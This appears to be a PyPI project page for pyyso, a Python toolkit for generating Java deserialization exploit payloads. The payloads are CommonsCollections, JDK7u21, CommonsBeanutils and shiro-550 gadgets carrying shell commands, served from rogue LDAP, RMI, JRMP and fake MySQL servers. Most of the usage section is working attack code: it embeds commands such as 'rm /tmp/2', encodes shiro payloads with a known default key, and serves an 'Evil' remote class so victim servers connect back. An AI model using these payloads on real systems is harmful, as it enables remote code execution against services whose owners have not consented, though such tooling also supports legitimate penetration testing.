a java serialized tool written in python
Project description
pyyso: powerful java serialized toolkit
What is it?
pyyso is a Python package that provides fast and flexible ways to generate java serialized poc. It aims to be the fundamental high-level building block for doing vulnerability check and research in Python. Additionally, it has a goal of becoming the most convenient and reliable toolkit implemented in Python for Java researchers
Main Features
Here are just a few of the things that pyyso does well:
- Easy generating of java serialized poc
- Powerful, flexible functionality to start a LDAP/RMI/JRMP/MySQL server to host java serialized pocs
- Communicating and collaborating with other Python packages
- Won't be exploited back in RMI like java client
pyyso has implemented
- URLDNS Gadget
- CommonsCollections1-7 Gadgets
- JDK7u21 Gadget
- JDK8u21 Gadget
- CommonsBeanutils1 1.8.3 no cc
- CommonsBeanutils1 1.9.2
- shiro-550 rememberMe deserialized
- java class embed with command
- LDAP server hosting java serialized pocs
- LDAP server hosting java remote reference factory
- RMI server
- high JDK version beanfactory bypass
- JRMP server
- JRMPClient Gadget
- Fake MySQL server for JDBC deserialize
Where to get it
The source code is currently host on GitHub at: https://github.com/cokeBeer/pyyso
Installation from sources
pip install pyyso
How to use
basic usage
First import pyyso
import pyyso
To generate a java serialized zed poc use:
pyyso.urldns("https://x.dnslog.com") #return java serialzed data of URLDNS in bytes
pyyso.cc1("touch /tmp/1") #return java serialzed data of CommonsColletions1 in bytes
pyyso.cc2("touch /tmp/1") #return java serialzed data of CommonsColletions2 in bytes
pyyso.jdk7u21("touch /tmp/1") #return java serialzed data of JDK7u21 in bytes
pyyso.jdk8u20("touch /tmp/1") #return java serialzed data of JDK8u20 in bytes
pyyso.jrmpclient("127.0.0.1",80) #return java serialzed data of jrmpclient in bytes
pyyso.cb1v183("touch /tmp/1") #return java serialzed data of CommonsBeanutils1 1.8.3 no cc in bytes
To generate a java class embed with command use:
pyyso.clazz("touch /tmp/1") #return java class embed with command in bytes
shiro
To encode a shiro poc use:
serobj=pyyso.cb1v183("touch /tmp/1")
pyyso.shiroEncode(serobj=serobj,key=b'kPH+bIxk5D2deZiIxcaaaA==')
LDAP
To start a LDAP server hosting java serialized pocs:
serobj=pyyso.cc1("touch /tmp/1")
server=pyyso.LdapSerialized(serobj=serobj, ip="0.0.0.0", port=1389)
server.run()
This will start a LDAP server listening 0.0.0.0:1389
You can change the hosted java serialized data by:
server.serobj=pyyso.cc1("rm /tmp/2")
To start a LDAP server hosting java remote reference factory:
server=pyyso.LdapRemoteRef(javaCodeBase="http://127.0.0.1:8088/", javaFactory="Evil", javaClassName="java.lang.String", ip="0.0.0.0", port=1389):
server.run()
This will start a LDAP server listening 0.0.0.0:1389
and will return a remote reference point to http://127.0.0.1:8088/Evil.class
JRMP
To start a JRMPListener
serobj=pyyso.cc1("open /tmp",jrmp=True) #note that there is 'jrmp=True'!
server=pyyso.JRMPListener(serobj=,ip="0.0.0.0", port=5151)
server.run()
This will start a JRMPListener listening 0.0.0.0:5151
By deserializing a jrmpclient Gadget in victim's server, the victim's server will connect back to JRMPListener.
the jrmpclient Gadget should be made by:
serobj=pyyso.jrmpclient(hostname="127.0.0.1", port=5151)
which the hostname is corresponding to where JRMPListener is hosting on
RMI and bypass
To get a bypass poc, use:
serobj=pyyso.beanfactory("open /tmp", rmi=True)
To start a RMI server and host bypass poc, use:
serobj=pyyso.beanfactory("open /",rmi=True) ##note that there is 'rmi=True'!
server=pyyso.RMIServer(serobj=serobj,ip="0.0.0.0", port=1099, refip="0.0.0.0", refport=42155)
server.run()
a registry will listen 0.0.0.0:1099 and a poc provider server will listen 0.0.0.0:42155
MySQL
to start a MySQL server hosts JDBC deserialize payload, use:
serobj=pyyso.cc2("open /")
server=pyyso.MysqlServer(serobj=serobj, ip="0.0.0.0", port=3306)
server.run()
a fake MySQL server will listen 0.0.0.0:3306, and wait for SHOW STATUS
Support Options
For some reasons, part Gadgets support JRMP or RMI now,which can be enabled by rmi=True or jrmp=True
| Gadgets | Basic | jrmp option | rmi option |
|---|---|---|---|
| CC1-CC7 | ✅ | ✅ | ❌ |
| CB1v192 | ✅ | ✅ | ❌ |
| CB1v183 | ✅ | ✅ | ❌ |
| JDK7u21 | ✅ | ✅ | ❌ |
| beanfactory | ❌ | ❌ | ✅ |
| others | ✅ | ❌ | ❌ |
License
Inspired by
https://github.com/frohoff/ysoserial
https://github.com/mbechler/marshalsec
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
File details
Details for the file pyyso-0.0.11.tar.gz.
File metadata
- Download URL: pyyso-0.0.11.tar.gz
- Upload date:
- Size: 21.5 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.0 CPython/3.9.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | 2b0384de373d7823ffade18305df9fc01dc00192cea50f4d444f41b5838a50a1 |
|
| MD5 | e8df22b7776eca50f9629de9f74678b0 |
|
| BLAKE2b-256 | b7cac4f4dd0e2aceeee4585d90501ab624c40cbb71d5d54f6e30d60e062ec42a |
File details
Details for the file pyyso-0.0.11-py3-none-any.whl.
File metadata
- Download URL: pyyso-0.0.11-py3-none-any.whl
- Upload date:
- Size: 40.5 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.0 CPython/3.9.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | 6a35d0a6d9bc7fbe473520752f1b2cb5d98ba6619bb4f4a1841a62e4ee700976 |
|
| MD5 | d4b86d0373e3e68c4d90056978e2d960 |
|
| BLAKE2b-256 | 754149677522e95af7cb1ef3cd479d989b53f523ed1a1c7ca85f6c06532a2a51 |
